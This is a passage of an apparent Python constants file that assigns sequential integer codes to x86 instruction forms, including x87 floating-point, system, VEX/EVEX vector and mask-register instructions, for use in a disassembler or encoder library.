RCL_RM32_CL: int = 473
RCL_RM64_CL: int = 474
RCR_RM16_CL: int = 475
RCR_RM32_CL: int = 476
RCR_RM64_CL: int = 477
SHL_RM16_CL: int = 478
SHL_RM32_CL: int = 479
SHL_RM64_CL: int = 480
SHR_RM16_CL: int = 481
SHR_RM32_CL: int = 482
SHR_RM64_CL: int = 483
SAL_RM16_CL: int = 484
SAL_RM32_CL: int = 485
SAL_RM64_CL: int = 486
SAR_RM16_CL: int = 487
SAR_RM32_CL: int = 488
SAR_RM64_CL: int = 489
AAM_IMM8: int = 490
AAD_IMM8: int = 491
SALC: int = 492
XLAT_M8: int = 493
FADD_M32FP: int = 494
FMUL_M32FP: int = 495
FCOM_M32FP: int = 496
FCOMP_M32FP: int = 497
FSUB_M32FP: int = 498
FSUBR_M32FP: int = 499
FDIV_M32FP: int = 500
FDIVR_M32FP: int = 501
FADD_ST0_STI: int = 502
FMUL_ST0_STI: int = 503
FCOM_ST0_STI: int = 504
FCOMP_ST0_STI: int = 505
FSUB_ST0_STI: int = 506
FSUBR_ST0_STI: int = 507
FDIV_ST0_STI: int = 508
FDIVR_ST0_STI: int = 509
FLD_M32FP: int = 510
FST_M32FP: int = 511
FSTP_M32FP: int = 512
FLDENV_M14BYTE: int = 513
FLDENV_M28BYTE: int = 514
FLDCW_M2BYTE: int = 515
FNSTENV_M14BYTE: int = 516
FSTENV_M14BYTE: int = 517
FNSTENV_M28BYTE: int = 518
FSTENV_M28BYTE: int = 519
FNSTCW_M2BYTE: int = 520
FSTCW_M2BYTE: int = 521
FLD_STI: int = 522
FXCH_ST0_STI: int = 523
FNOP: int = 524
FSTPNCE_STI: int = 525
FCHS: int = 526
FABS: int = 527
FTST: int = 528
FXAM: int = 529
FLD1: int = 530
FLDL2T: int = 531
FLDL2E: int = 532
FLDPI: int = 533
FLDLG2: int = 534
FLDLN2: int = 535
FLDZ: int = 536
F2XM1: int = 537
FYL2X: int = 538
FPTAN: int = 539
FPATAN: int = 540
FXTRACT: int = 541
FPREM1: int = 542
FDECSTP: int = 543
FINCSTP: int = 544
FPREM: int = 545
FYL2XP1: int = 546
FSQRT: int = 547
FSINCOS: int = 548
FRNDINT: int = 549
FSCALE: int = 550
FSIN: int = 551
FCOS: int = 552
FIADD_M32INT: int = 553
FIMUL_M32INT: int = 554
FICOM_M32INT: int = 555
FICOMP_M32INT: int = 556
FISUB_M32INT: int = 557
FISUBR_M32INT: int = 558
FIDIV_M32INT: int = 559
FIDIVR_M32INT: int = 560
FCMOVB_ST0_STI: int = 561
FCMOVE_ST0_STI: int = 562
FCMOVBE_ST0_STI: int = 563
FCMOVU_ST0_STI: int = 564
FUCOMPP: int = 565
FILD_M32INT: int = 566
FISTTP_M32INT: int = 567
FIST_M32INT: int = 568
FISTP_M32INT: int = 569
FLD_M80FP: int = 570
FSTP_M80FP: int = 571
FCMOVNB_ST0_STI: int = 572
FCMOVNE_ST0_STI: int = 573
FCMOVNBE_ST0_STI: int = 574
FCMOVNU_ST0_STI: int = 575
FNENI: int = 576
FENI: int = 577
FNDISI: int = 578
FDISI: int = 579
FNCLEX: int = 580
FCLEX: int = 581
FNINIT: int = 582
FINIT: int = 583
FNSETPM: int = 584
FSETPM: int = 585
FRSTPM: int = 586
FUCOMI_ST0_STI: int = 587
FCOMI_ST0_STI: int = 588
FADD_M64FP: int = 589
FMUL_M64FP: int = 590
FCOM_M64FP: int = 591
FCOMP_M64FP: int = 592
FSUB_M64FP: int = 593
FSUBR_M64FP: int = 594
FDIV_M64FP: int = 595
FDIVR_M64FP: int = 596
FADD_STI_ST0: int = 597
FMUL_STI_ST0: int = 598
FCOM_ST0_STI_DCD0: int = 599
FCOMP_ST0_STI_DCD8: int = 600
FSUBR_STI_ST0: int = 601
FSUB_STI_ST0: int = 602
FDIVR_STI_ST0: int = 603
FDIV_STI_ST0: int = 604
FLD_M64FP: int = 605
FISTTP_M64INT: int = 606
FST_M64FP: int = 607
FSTP_M64FP: int = 608
FRSTOR_M94BYTE: int = 609
FRSTOR_M108BYTE: int = 610
FNSAVE_M94BYTE: int = 611
FSAVE_M94BYTE: int = 612
FNSAVE_M108BYTE: int = 613
FSAVE_M108BYTE: int = 614
FNSTSW_M2BYTE: int = 615
FSTSW_M2BYTE: int = 616
FFREE_STI: int = 617
FXCH_ST0_STI_DDC8: int = 618
FST_STI: int = 619
FSTP_STI: int = 620
FUCOM_ST0_STI: int = 621
FUCOMP_ST0_STI: int = 622
FIADD_M16INT: int = 623
FIMUL_M16INT: int = 624
FICOM_M16INT: int = 625
FICOMP_M16INT: int = 626
FISUB_M16INT: int = 627
FISUBR_M16INT: int = 628
FIDIV_M16INT: int = 629
FIDIVR_M16INT: int = 630
FADDP_STI_ST0: int = 631
FMULP_STI_ST0: int = 632
FCOMP_ST0_STI_DED0: int = 633
FCOMPP: int = 634
FSUBRP_STI_ST0: int = 635
FSUBP_STI_ST0: int = 636
FDIVRP_STI_ST0: int = 637
FDIVP_STI_ST0: int = 638
FILD_M16INT: int = 639
FISTTP_M16INT: int = 640
FIST_M16INT: int = 641
FISTP_M16INT: int = 642
FBLD_M80BCD: int = 643
FILD_M64INT: int = 644
FBSTP_M80BCD: int = 645
FISTP_M64INT: int = 646
FFREEP_STI: int = 647
FXCH_ST0_STI_DFC8: int = 648
FSTP_STI_DFD0: int = 649
FSTP_STI_DFD8: int = 650
FNSTSW_AX: int = 651
FSTSW_AX: int = 652
FSTDW_AX: int = 653
FSTSG_AX: int = 654
FUCOMIP_ST0_STI: int = 655
FCOMIP_ST0_STI: int = 656
LOOPNE_REL8_16_CX: int = 657
LOOPNE_REL8_32_CX: int = 658
LOOPNE_REL8_16_ECX: int = 659
LOOPNE_REL8_32_ECX: int = 660
LOOPNE_REL8_64_ECX: int = 661
LOOPNE_REL8_16_RCX: int = 662
LOOPNE_REL8_64_RCX: int = 663
LOOPE_REL8_16_CX: int = 664
LOOPE_REL8_32_CX: int = 665
LOOPE_REL8_16_ECX: int = 666
LOOPE_REL8_32_ECX: int = 667
LOOPE_REL8_64_ECX: int = 668
LOOPE_REL8_16_RCX: int = 669
LOOPE_REL8_64_RCX: int = 670
LOOP_REL8_16_CX: int = 671
LOOP_REL8_32_CX: int = 672
LOOP_REL8_16_ECX: int = 673
LOOP_REL8_32_ECX: int = 674
LOOP_REL8_64_ECX: int = 675
LOOP_REL8_16_RCX: int = 676
LOOP_REL8_64_RCX: int = 677
JCXZ_REL8_16: int = 678
JCXZ_REL8_32: int = 679
JECXZ_REL8_16: int = 680
JECXZ_REL8_32: int = 681
JECXZ_REL8_64: int = 682
JRCXZ_REL8_16: int = 683
JRCXZ_REL8_64: int = 684
IN_AL_IMM8: int = 685
IN_AX_IMM8: int = 686
IN_EAX_IMM8: int = 687
OUT_IMM8_AL: int = 688
OUT_IMM8_AX: int = 689
OUT_IMM8_EAX: int = 690
CALL_REL16: int = 691
CALL_REL32_32: int = 692
CALL_REL32_64: int = 693
JMP_REL16: int = 694
JMP_REL32_32: int = 695
JMP_REL32_64: int = 696
JMP_PTR1616: int = 697
JMP_PTR1632: int = 698
JMP_REL8_16: int = 699
JMP_REL8_32: int = 700
JMP_REL8_64: int = 701
IN_AL_DX: int = 702
IN_AX_DX: int = 703
IN_EAX_DX: int = 704
OUT_DX_AL: int = 705
OUT_DX_AX: int = 706
OUT_DX_EAX: int = 707
INT1: int = 708
HLT: int = 709
CMC: int = 710
TEST_RM8_IMM8: int = 711
TEST_RM8_IMM8_F6R1: int = 712
NOT_RM8: int = 713
NEG_RM8: int = 714
MUL_RM8: int = 715
IMUL_RM8: int = 716
DIV_RM8: int = 717
IDIV_RM8: int = 718
TEST_RM16_IMM16: int = 719
TEST_RM32_IMM32: int = 720
TEST_RM64_IMM32: int = 721
TEST_RM16_IMM16_F7R1: int = 722
TEST_RM32_IMM32_F7R1: int = 723
TEST_RM64_IMM32_F7R1: int = 724
NOT_RM16: int = 725
NOT_RM32: int = 726
NOT_RM64: int = 727
NEG_RM16: int = 728
NEG_RM32: int = 729
NEG_RM64: int = 730
MUL_RM16: int = 731
MUL_RM32: int = 732
MUL_RM64: int = 733
IMUL_RM16: int = 734
IMUL_RM32: int = 735
IMUL_RM64: int = 736
DIV_RM16: int = 737
DIV_RM32: int = 738
DIV_RM64: int = 739
IDIV_RM16: int = 740
IDIV_RM32: int = 741
IDIV_RM64: int = 742
CLC: int = 743
STC: int = 744
CLI: int = 745
STI: int = 746
CLD: int = 747
STD: int = 748
INC_RM8: int = 749
DEC_RM8: int = 750
INC_RM16: int = 751
INC_RM32: int = 752
INC_RM64: int = 753
DEC_RM16: int = 754
DEC_RM32: int = 755
DEC_RM64: int = 756
CALL_RM16: int = 757
CALL_RM32: int = 758
CALL_RM64: int = 759
CALL_M1616: int = 760
CALL_M1632: int = 761
CALL_M1664: int = 762
JMP_RM16: int = 763
JMP_RM32: int = 764
JMP_RM64: int = 765
JMP_M1616: int = 766
JMP_M1632: int = 767
JMP_M1664: int = 768
PUSH_RM16: int = 769
PUSH_RM32: int = 770
PUSH_RM64: int = 771
SLDT_RM16: int = 772
SLDT_R32M16: int = 773
SLDT_R64M16: int = 774
STR_RM16: int = 775
STR_R32M16: int = 776
STR_R64M16: int = 777
LLDT_RM16: int = 778
LLDT_R32M16: int = 779
LLDT_R64M16: int = 780
LTR_RM16: int = 781
LTR_R32M16: int = 782
LTR_R64M16: int = 783
VERR_RM16: int = 784
VERR_R32M16: int = 785
VERR_R64M16: int = 786
VERW_RM16: int = 787
VERW_R32M16: int = 788
VERW_R64M16: int = 789
JMPE_RM16: int = 790
JMPE_RM32: int = 791
SGDT_M1632_16: int = 792
SGDT_M1632: int = 793
SGDT_M1664: int = 794
SIDT_M1632_16: int = 795
SIDT_M1632: int = 796
SIDT_M1664: int = 797
LGDT_M1632_16: int = 798
LGDT_M1632: int = 799
LGDT_M1664: int = 800
LIDT_M1632_16: int = 801
LIDT_M1632: int = 802
LIDT_M1664: int = 803
SMSW_RM16: int = 804
SMSW_R32M16: int = 805
SMSW_R64M16: int = 806
RSTORSSP_M64: int = 807
LMSW_RM16: int = 808
LMSW_R32M16: int = 809
LMSW_R64M16: int = 810
INVLPG_M: int = 811
ENCLV: int = 812
VMCALL: int = 813
VMLAUNCH: int = 814
VMRESUME: int = 815
VMXOFF: int = 816
PCONFIG: int = 817
MONITORW: int = 818
MONITORD: int = 819
MONITORQ: int = 820
MWAIT: int = 821
CLAC: int = 822
STAC: int = 823
ENCLS: int = 824
XGETBV: int = 825
XSETBV: int = 826
VMFUNC: int = 827
XEND: int = 828
XTEST: int = 829
ENCLU: int = 830
VMRUNW: int = 831
VMRUND: int = 832
VMRUNQ: int = 833
VMMCALL: int = 834
VMLOADW: int = 835
VMLOADD: int = 836
VMLOADQ: int = 837
VMSAVEW: int = 838
VMSAVED: int = 839
VMSAVEQ: int = 840
STGI: int = 841
CLGI: int = 842
SKINIT: int = 843
INVLPGAW: int = 844
INVLPGAD: int = 845
INVLPGAQ: int = 846
SETSSBSY: int = 847
SAVEPREVSSP: int = 848
RDPKRU: int = 849
WRPKRU: int = 850
SWAPGS: int = 851
RDTSCP: int = 852
MONITORXW: int = 853
MONITORXD: int = 854
MONITORXQ: int = 855
MCOMMIT: int = 856
MWAITX: int = 857
CLZEROW: int = 858
CLZEROD: int = 859
CLZEROQ: int = 860
RDPRU: int = 861
LAR_R16_RM16: int = 862
LAR_R32_R32M16: int = 863
LAR_R64_R64M16: int = 864
LSL_R16_RM16: int = 865
LSL_R32_R32M16: int = 866
LSL_R64_R64M16: int = 867
STOREALL: int = 868
LOADALL286: int = 869
SYSCALL: int = 870
CLTS: int = 871
LOADALL386: int = 872
SYSRETD: int = 873
SYSRETQ: int = 874
INVD: int = 875
WBINVD: int = 876
WBNOINVD: int = 877
CL1INVMB: int = 878
UD2: int = 879
RESERVEDNOP_RM16_R16_0F0D: int = 880
RESERVEDNOP_RM32_R32_0F0D: int = 881
RESERVEDNOP_RM64_R64_0F0D: int = 882
PREFETCH_M8: int = 883
PREFETCHW_M8: int = 884
PREFETCHWT1_M8: int = 885
FEMMS: int = 886
UMOV_RM8_R8: int = 887
UMOV_RM16_R16: int = 888
UMOV_RM32_R32: int = 889
UMOV_R8_RM8: int = 890
UMOV_R16_RM16: int = 891
UMOV_R32_RM32: int = 892
MOVUPS_XMM_XMMM128: int = 893
VEX_VMOVUPS_XMM_XMMM128: int = 894
VEX_VMOVUPS_YMM_YMMM256: int = 895
EVEX_VMOVUPS_XMM_K1Z_XMMM128: int = 896
EVEX_VMOVUPS_YMM_K1Z_YMMM256: int = 897
EVEX_VMOVUPS_ZMM_K1Z_ZMMM512: int = 898
MOVUPD_XMM_XMMM128: int = 899
VEX_VMOVUPD_XMM_XMMM128: int = 900
VEX_VMOVUPD_YMM_YMMM256: int = 901
EVEX_VMOVUPD_XMM_K1Z_XMMM128: int = 902
EVEX_VMOVUPD_YMM_K1Z_YMMM256: int = 903
EVEX_VMOVUPD_ZMM_K1Z_ZMMM512: int = 904
MOVSS_XMM_XMMM32: int = 905
VEX_VMOVSS_XMM_XMM_XMM: int = 906
VEX_VMOVSS_XMM_M32: int = 907
EVEX_VMOVSS_XMM_K1Z_XMM_XMM: int = 908
EVEX_VMOVSS_XMM_K1Z_M32: int = 909
MOVSD_XMM_XMMM64: int = 910
VEX_VMOVSD_XMM_XMM_XMM: int = 911
VEX_VMOVSD_XMM_M64: int = 912
EVEX_VMOVSD_XMM_K1Z_XMM_XMM: int = 913
EVEX_VMOVSD_XMM_K1Z_M64: int = 914
MOVUPS_XMMM128_XMM: int = 915
VEX_VMOVUPS_XMMM128_XMM: int = 916
VEX_VMOVUPS_YMMM256_YMM: int = 917
EVEX_VMOVUPS_XMMM128_K1Z_XMM: int = 918
EVEX_VMOVUPS_YMMM256_K1Z_YMM: int = 919
EVEX_VMOVUPS_ZMMM512_K1Z_ZMM: int = 920
MOVUPD_XMMM128_XMM: int = 921
VEX_VMOVUPD_XMMM128_XMM: int = 922
VEX_VMOVUPD_YMMM256_YMM: int = 923
EVEX_VMOVUPD_XMMM128_K1Z_XMM: int = 924
EVEX_VMOVUPD_YMMM256_K1Z_YMM: int = 925
EVEX_VMOVUPD_ZMMM512_K1Z_ZMM: int = 926
MOVSS_XMMM32_XMM: int = 927
VEX_VMOVSS_XMM_XMM_XMM_0F11: int = 928
VEX_VMOVSS_M32_XMM: int = 929
EVEX_VMOVSS_XMM_K1Z_XMM_XMM_0F11: int = 930
EVEX_VMOVSS_M32_K1_XMM: int = 931
MOVSD_XMMM64_XMM: int = 932
VEX_VMOVSD_XMM_XMM_XMM_0F11: int = 933
VEX_VMOVSD_M64_XMM: int = 934
EVEX_VMOVSD_XMM_K1Z_XMM_XMM_0F11: int = 935
EVEX_VMOVSD_M64_K1_XMM: int = 936
MOVHLPS_XMM_XMM: int = 937
MOVLPS_XMM_M64: int = 938
VEX_VMOVHLPS_XMM_XMM_XMM: int = 939
VEX_VMOVLPS_XMM_XMM_M64: int = 940
EVEX_VMOVHLPS_XMM_XMM_XMM: int = 941
EVEX_VMOVLPS_XMM_XMM_M64: int = 942
MOVLPD_XMM_M64: int = 943
VEX_VMOVLPD_XMM_XMM_M64: int = 944
EVEX_VMOVLPD_XMM_XMM_M64: int = 945
MOVSLDUP_XMM_XMMM128: int = 946
VEX_VMOVSLDUP_XMM_XMMM128: int = 947
VEX_VMOVSLDUP_YMM_YMMM256: int = 948
EVEX_VMOVSLDUP_XMM_K1Z_XMMM128: int = 949
EVEX_VMOVSLDUP_YMM_K1Z_YMMM256: int = 950
EVEX_VMOVSLDUP_ZMM_K1Z_ZMMM512: int = 951
MOVDDUP_XMM_XMMM64: int = 952
VEX_VMOVDDUP_XMM_XMMM64: int = 953
VEX_VMOVDDUP_YMM_YMMM256: int = 954
EVEX_VMOVDDUP_XMM_K1Z_XMMM64: int = 955
EVEX_VMOVDDUP_YMM_K1Z_YMMM256: int = 956
EVEX_VMOVDDUP_ZMM_K1Z_ZMMM512: int = 957
MOVLPS_M64_XMM: int = 958
VEX_VMOVLPS_M64_XMM: int = 959
EVEX_VMOVLPS_M64_XMM: int = 960
MOVLPD_M64_XMM: int = 961
VEX_VMOVLPD_M64_XMM: int = 962
EVEX_VMOVLPD_M64_XMM: int = 963
UNPCKLPS_XMM_XMMM128: int = 964
VEX_VUNPCKLPS_XMM_XMM_XMMM128: int = 965
VEX_VUNPCKLPS_YMM_YMM_YMMM256: int = 966
EVEX_VUNPCKLPS_XMM_K1Z_XMM_XMMM128B32: int = 967
EVEX_VUNPCKLPS_YMM_K1Z_YMM_YMMM256B32: int = 968
EVEX_VUNPCKLPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 969
UNPCKLPD_XMM_XMMM128: int = 970
VEX_VUNPCKLPD_XMM_XMM_XMMM128: int = 971
VEX_VUNPCKLPD_YMM_YMM_YMMM256: int = 972
EVEX_VUNPCKLPD_XMM_K1Z_XMM_XMMM128B64: int = 973
EVEX_VUNPCKLPD_YMM_K1Z_YMM_YMMM256B64: int = 974
EVEX_VUNPCKLPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 975
UNPCKHPS_XMM_XMMM128: int = 976
VEX_VUNPCKHPS_XMM_XMM_XMMM128: int = 977
VEX_VUNPCKHPS_YMM_YMM_YMMM256: int = 978
EVEX_VUNPCKHPS_XMM_K1Z_XMM_XMMM128B32: int = 979
EVEX_VUNPCKHPS_YMM_K1Z_YMM_YMMM256B32: int = 980
EVEX_VUNPCKHPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 981
UNPCKHPD_XMM_XMMM128: int = 982
VEX_VUNPCKHPD_XMM_XMM_XMMM128: int = 983
VEX_VUNPCKHPD_YMM_YMM_YMMM256: int = 984
EVEX_VUNPCKHPD_XMM_K1Z_XMM_XMMM128B64: int = 985
EVEX_VUNPCKHPD_YMM_K1Z_YMM_YMMM256B64: int = 986
EVEX_VUNPCKHPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 987
MOVLHPS_XMM_XMM: int = 988
VEX_VMOVLHPS_XMM_XMM_XMM: int = 989
EVEX_VMOVLHPS_XMM_XMM_XMM: int = 990
MOVHPS_XMM_M64: int = 991
VEX_VMOVHPS_XMM_XMM_M64: int = 992
EVEX_VMOVHPS_XMM_XMM_M64: int = 993
MOVHPD_XMM_M64: int = 994
VEX_VMOVHPD_XMM_XMM_M64: int = 995
EVEX_VMOVHPD_XMM_XMM_M64: int = 996
MOVSHDUP_XMM_XMMM128: int = 997
VEX_VMOVSHDUP_XMM_XMMM128: int = 998
VEX_VMOVSHDUP_YMM_YMMM256: int = 999
EVEX_VMOVSHDUP_XMM_K1Z_XMMM128: int = 1000
EVEX_VMOVSHDUP_YMM_K1Z_YMMM256: int = 1001
EVEX_VMOVSHDUP_ZMM_K1Z_ZMMM512: int = 1002
MOVHPS_M64_XMM: int = 1003
VEX_VMOVHPS_M64_XMM: int = 1004
EVEX_VMOVHPS_M64_XMM: int = 1005
MOVHPD_M64_XMM: int = 1006
VEX_VMOVHPD_M64_XMM: int = 1007
EVEX_VMOVHPD_M64_XMM: int = 1008
RESERVEDNOP_RM16_R16_0F18: int = 1009
RESERVEDNOP_RM32_R32_0F18: int = 1010
RESERVEDNOP_RM64_R64_0F18: int = 1011
RESERVEDNOP_RM16_R16_0F19: int = 1012
RESERVEDNOP_RM32_R32_0F19: int = 1013
RESERVEDNOP_RM64_R64_0F19: int = 1014
RESERVEDNOP_RM16_R16_0F1A: int = 1015
RESERVEDNOP_RM32_R32_0F1A: int = 1016
RESERVEDNOP_RM64_R64_0F1A: int = 1017
RESERVEDNOP_RM16_R16_0F1B: int = 1018
RESERVEDNOP_RM32_R32_0F1B: int = 1019
RESERVEDNOP_RM64_R64_0F1B: int = 1020
RESERVEDNOP_RM16_R16_0F1C: int = 1021
RESERVEDNOP_RM32_R32_0F1C: int = 1022
RESERVEDNOP_RM64_R64_0F1C: int = 1023
RESERVEDNOP_RM16_R16_0F1D: int = 1024
RESERVEDNOP_RM32_R32_0F1D: int = 1025
RESERVEDNOP_RM64_R64_0F1D: int = 1026
RESERVEDNOP_RM16_R16_0F1E: int = 1027
RESERVEDNOP_RM32_R32_0F1E: int = 1028
RESERVEDNOP_RM64_R64_0F1E: int = 1029
RESERVEDNOP_RM16_R16_0F1F: int = 1030
RESERVEDNOP_RM32_R32_0F1F: int = 1031
RESERVEDNOP_RM64_R64_0F1F: int = 1032
PREFETCHNTA_M8: int = 1033
PREFETCHT0_M8: int = 1034
PREFETCHT1_M8: int = 1035
PREFETCHT2_M8: int = 1036
BNDLDX_BND_MIB: int = 1037
BNDMOV_BND_BNDM64: int = 1038
BNDMOV_BND_BNDM128: int = 1039
BNDCL_BND_RM32: int = 1040
BNDCL_BND_RM64: int = 1041
BNDCU_BND_RM32: int = 1042
BNDCU_BND_RM64: int = 1043
BNDSTX_MIB_BND: int = 1044
BNDMOV_BNDM64_BND: int = 1045
BNDMOV_BNDM128_BND: int = 1046
BNDMK_BND_M32: int = 1047
BNDMK_BND_M64: int = 1048
BNDCN_BND_RM32: int = 1049
BNDCN_BND_RM64: int = 1050
CLDEMOTE_M8: int = 1051
RDSSPD_R32: int = 1052
RDSSPQ_R64: int = 1053
ENDBR64: int = 1054
ENDBR32: int = 1055
NOP_RM16: int = 1056
NOP_RM32: int = 1057
NOP_RM64: int = 1058
MOV_R32_CR: int = 1059
MOV_R64_CR: int = 1060
MOV_R32_DR: int = 1061
MOV_R64_DR: int = 1062
MOV_CR_R32: int = 1063
MOV_CR_R64: int = 1064
MOV_DR_R32: int = 1065
MOV_DR_R64: int = 1066
MOV_R32_TR: int = 1067
MOV_TR_R32: int = 1068
MOVAPS_XMM_XMMM128: int = 1069
VEX_VMOVAPS_XMM_XMMM128: int = 1070
VEX_VMOVAPS_YMM_YMMM256: int = 1071
EVEX_VMOVAPS_XMM_K1Z_XMMM128: int = 1072
EVEX_VMOVAPS_YMM_K1Z_YMMM256: int = 1073
EVEX_VMOVAPS_ZMM_K1Z_ZMMM512: int = 1074
MOVAPD_XMM_XMMM128: int = 1075
VEX_VMOVAPD_XMM_XMMM128: int = 1076
VEX_VMOVAPD_YMM_YMMM256: int = 1077
EVEX_VMOVAPD_XMM_K1Z_XMMM128: int = 1078
EVEX_VMOVAPD_YMM_K1Z_YMMM256: int = 1079
EVEX_VMOVAPD_ZMM_K1Z_ZMMM512: int = 1080
MOVAPS_XMMM128_XMM: int = 1081
VEX_VMOVAPS_XMMM128_XMM: int = 1082
VEX_VMOVAPS_YMMM256_YMM: int = 1083
EVEX_VMOVAPS_XMMM128_K1Z_XMM: int = 1084
EVEX_VMOVAPS_YMMM256_K1Z_YMM: int = 1085
EVEX_VMOVAPS_ZMMM512_K1Z_ZMM: int = 1086
MOVAPD_XMMM128_XMM: int = 1087
VEX_VMOVAPD_XMMM128_XMM: int = 1088
VEX_VMOVAPD_YMMM256_YMM: int = 1089
EVEX_VMOVAPD_XMMM128_K1Z_XMM: int = 1090
EVEX_VMOVAPD_YMMM256_K1Z_YMM: int = 1091
EVEX_VMOVAPD_ZMMM512_K1Z_ZMM: int = 1092
CVTPI2PS_XMM_MMM64: int = 1093
CVTPI2PD_XMM_MMM64: int = 1094
CVTSI2SS_XMM_RM32: int = 1095
CVTSI2SS_XMM_RM64: int = 1096
VEX_VCVTSI2SS_XMM_XMM_RM32: int = 1097
VEX_VCVTSI2SS_XMM_XMM_RM64: int = 1098
EVEX_VCVTSI2SS_XMM_XMM_RM32_ER: int = 1099
EVEX_VCVTSI2SS_XMM_XMM_RM64_ER: int = 1100
CVTSI2SD_XMM_RM32: int = 1101
CVTSI2SD_XMM_RM64: int = 1102
VEX_VCVTSI2SD_XMM_XMM_RM32: int = 1103
VEX_VCVTSI2SD_XMM_XMM_RM64: int = 1104
EVEX_VCVTSI2SD_XMM_XMM_RM32_ER: int = 1105
EVEX_VCVTSI2SD_XMM_XMM_RM64_ER: int = 1106
MOVNTPS_M128_XMM: int = 1107
VEX_VMOVNTPS_M128_XMM: int = 1108
VEX_VMOVNTPS_M256_YMM: int = 1109
EVEX_VMOVNTPS_M128_XMM: int = 1110
EVEX_VMOVNTPS_M256_YMM: int = 1111
EVEX_VMOVNTPS_M512_ZMM: int = 1112
MOVNTPD_M128_XMM: int = 1113
VEX_VMOVNTPD_M128_XMM: int = 1114
VEX_VMOVNTPD_M256_YMM: int = 1115
EVEX_VMOVNTPD_M128_XMM: int = 1116
EVEX_VMOVNTPD_M256_YMM: int = 1117
EVEX_VMOVNTPD_M512_ZMM: int = 1118
MOVNTSS_M32_XMM: int = 1119
MOVNTSD_M64_XMM: int = 1120
CVTTPS2PI_MM_XMMM64: int = 1121
CVTTPD2PI_MM_XMMM128: int = 1122
CVTTSS2SI_R32_XMMM32: int = 1123
CVTTSS2SI_R64_XMMM32: int = 1124
VEX_VCVTTSS2SI_R32_XMMM32: int = 1125
VEX_VCVTTSS2SI_R64_XMMM32: int = 1126
EVEX_VCVTTSS2SI_R32_XMMM32_SAE: int = 1127
EVEX_VCVTTSS2SI_R64_XMMM32_SAE: int = 1128
CVTTSD2SI_R32_XMMM64: int = 1129
CVTTSD2SI_R64_XMMM64: int = 1130
VEX_VCVTTSD2SI_R32_XMMM64: int = 1131
VEX_VCVTTSD2SI_R64_XMMM64: int = 1132
EVEX_VCVTTSD2SI_R32_XMMM64_SAE: int = 1133
EVEX_VCVTTSD2SI_R64_XMMM64_SAE: int = 1134
CVTPS2PI_MM_XMMM64: int = 1135
CVTPD2PI_MM_XMMM128: int = 1136
CVTSS2SI_R32_XMMM32: int = 1137
CVTSS2SI_R64_XMMM32: int = 1138
VEX_VCVTSS2SI_R32_XMMM32: int = 1139
VEX_VCVTSS2SI_R64_XMMM32: int = 1140
EVEX_VCVTSS2SI_R32_XMMM32_ER: int = 1141
EVEX_VCVTSS2SI_R64_XMMM32_ER: int = 1142
CVTSD2SI_R32_XMMM64: int = 1143
CVTSD2SI_R64_XMMM64: int = 1144
VEX_VCVTSD2SI_R32_XMMM64: int = 1145
VEX_VCVTSD2SI_R64_XMMM64: int = 1146
EVEX_VCVTSD2SI_R32_XMMM64_ER: int = 1147
EVEX_VCVTSD2SI_R64_XMMM64_ER: int = 1148
UCOMISS_XMM_XMMM32: int = 1149
VEX_VUCOMISS_XMM_XMMM32: int = 1150
EVEX_VUCOMISS_XMM_XMMM32_SAE: int = 1151
UCOMISD_XMM_XMMM64: int = 1152
VEX_VUCOMISD_XMM_XMMM64: int = 1153
EVEX_VUCOMISD_XMM_XMMM64_SAE: int = 1154
COMISS_XMM_XMMM32: int = 1155
COMISD_XMM_XMMM64: int = 1156
VEX_VCOMISS_XMM_XMMM32: int = 1157
VEX_VCOMISD_XMM_XMMM64: int = 1158
EVEX_VCOMISS_XMM_XMMM32_SAE: int = 1159
EVEX_VCOMISD_XMM_XMMM64_SAE: int = 1160
WRMSR: int = 1161
RDTSC: int = 1162
RDMSR: int = 1163
RDPMC: int = 1164
SYSENTER: int = 1165
SYSEXITD: int = 1166
SYSEXITQ: int = 1167
GETSECD: int = 1168
CMOVO_R16_RM16: int = 1169
CMOVO_R32_RM32: int = 1170
CMOVO_R64_RM64: int = 1171
CMOVNO_R16_RM16: int = 1172
CMOVNO_R32_RM32: int = 1173
CMOVNO_R64_RM64: int = 1174
CMOVB_R16_RM16: int = 1175
CMOVB_R32_RM32: int = 1176
CMOVB_R64_RM64: int = 1177
CMOVAE_R16_RM16: int = 1178
CMOVAE_R32_RM32: int = 1179
CMOVAE_R64_RM64: int = 1180
CMOVE_R16_RM16: int = 1181
CMOVE_R32_RM32: int = 1182
CMOVE_R64_RM64: int = 1183
CMOVNE_R16_RM16: int = 1184
CMOVNE_R32_RM32: int = 1185
CMOVNE_R64_RM64: int = 1186
CMOVBE_R16_RM16: int = 1187
CMOVBE_R32_RM32: int = 1188
CMOVBE_R64_RM64: int = 1189
CMOVA_R16_RM16: int = 1190
CMOVA_R32_RM32: int = 1191
CMOVA_R64_RM64: int = 1192
CMOVS_R16_RM16: int = 1193
CMOVS_R32_RM32: int = 1194
CMOVS_R64_RM64: int = 1195
CMOVNS_R16_RM16: int = 1196
CMOVNS_R32_RM32: int = 1197
CMOVNS_R64_RM64: int = 1198
CMOVP_R16_RM16: int = 1199
CMOVP_R32_RM32: int = 1200
CMOVP_R64_RM64: int = 1201
CMOVNP_R16_RM16: int = 1202
CMOVNP_R32_RM32: int = 1203
CMOVNP_R64_RM64: int = 1204
CMOVL_R16_RM16: int = 1205
CMOVL_R32_RM32: int = 1206
CMOVL_R64_RM64: int = 1207
CMOVGE_R16_RM16: int = 1208
CMOVGE_R32_RM32: int = 1209
CMOVGE_R64_RM64: int = 1210
CMOVLE_R16_RM16: int = 1211
CMOVLE_R32_RM32: int = 1212
CMOVLE_R64_RM64: int = 1213
CMOVG_R16_RM16: int = 1214
CMOVG_R32_RM32: int = 1215
CMOVG_R64_RM64: int = 1216
VEX_KANDW_KR_KR_KR: int = 1217
VEX_KANDQ_KR_KR_KR: int = 1218
VEX_KANDB_KR_KR_KR: int = 1219
VEX_KANDD_KR_KR_KR: int = 1220
VEX_KANDNW_KR_KR_KR: int = 1221
VEX_KANDNQ_KR_KR_KR: int = 1222
VEX_KANDNB_KR_KR_KR: int = 1223
VEX_KANDND_KR_KR_KR: int = 1224
VEX_KNOTW_KR_KR: int = 1225
VEX_KNOTQ_KR_KR: int = 1226
VEX_KNOTB_KR_KR: int = 1227
VEX_KNOTD_KR_KR: int = 1228
VEX_KORW_KR_KR_KR: int = 1229
VEX_KORQ_KR_KR_KR: int = 1230
VEX_KORB_KR_KR_KR: int = 1231
VEX_KORD_KR_KR_KR: int = 1232
